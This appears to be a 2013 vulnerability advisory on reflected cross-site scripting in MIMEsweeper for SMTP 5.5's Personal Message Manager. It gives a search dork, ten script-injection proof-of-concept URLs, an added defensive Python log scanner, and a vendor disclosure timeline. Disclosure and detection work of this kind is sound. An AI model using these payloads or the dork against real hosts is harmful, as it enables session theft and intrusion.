
MIMEsweeper For SMTP 5.5 Cross Site Scripting

Posted Feb 18, 2013
Authored by Anastasios Monachos

MIMEsweeper for SMTP version 5.5 Personal Message Manager suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | f4113c5756cdb31f358053c005e5696d

Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]

[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>
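
Added example (not part of the original advisory and not vendor code): a log-review check that flags requests to the PMM pages and parameters listed above when a value carries HTML markup characters, including double-encoded ones. It assumes W3C extended format logs with a #Fields header; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Pages and parameters from the advisory's reproduction list (lower-cased).
AFFECTED = {
    "reminder.aspx": {"email"},
    "newaccount.aspx": {"email", "ddlculture", "btncreateaccount", "btncancel"},
    "signin.aspx": {"tbemailaddress", "tbpassword", "cbautosignin", "btnsignin", "reason"},
}
PREFIX = "/mswpmm/common/"
# Characters that let a reflected value leave HTML text or a quoted attribute.
MARKUP = re.compile(r'[<>"]')

def suspicious_params(stem, query):
    """Return sorted (page, param) pairs whose value carries markup characters."""
    path = unquote(stem).lower()
    if not path.startswith(PREFIX):
        return []
    page = path[len(PREFIX):]
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded input.
        if name.lower() in AFFECTED.get(page, ()) and MARKUP.search(unquote(value)):
            hits.add((page, name.lower()))
    return sorted(hits)

def scan_w3c(lines):
    """Scan W3C extended log lines; return [(line_no, client_ip, hits), ...]."""
    cols, found = {}, []
    for no, line in enumerate(lines, 1):
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                cols = {f: i for i, f in enumerate(line.split()[1:])}
            continue
        rec = line.split()
        if not cols.keys() >= {"cs-uri-stem", "cs-uri-query"} or len(rec) != len(cols):
            continue
        hits = suspicious_params(rec[cols["cs-uri-stem"]], rec[cols["cs-uri-query"]])
        if hits:
            found.append((no, rec[cols["c-ip"]] if "c-ip" in cols else "-", hits))
    return found

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-02-18 10:00:01 GET /MSWPMM/Common/SignIn.aspx ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 192.0.2.10 200
2013-02-18 10:00:05 GET /MSWPMM/Common/SignIn.aspx reason=%3Cscript%3Ealert(1)%3C/script%3E 192.0.2.44 200
2013-02-18 10:00:12 GET /MSWPMM/Common/NewAccount.aspx ddlCulture=%253Cscript%253E 198.51.100.7 200
""".splitlines()
```

Calling scan_w3c(SAMPLE) reports the third and fourth log lines; ordinary sign-in traffic with only a ReturnUrl parameter is not flagged.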

[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor of evaluation progress; v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor regarding the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave a notice for public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested postponing the disclosure until after the patch is public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested a demo license to verify the fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date
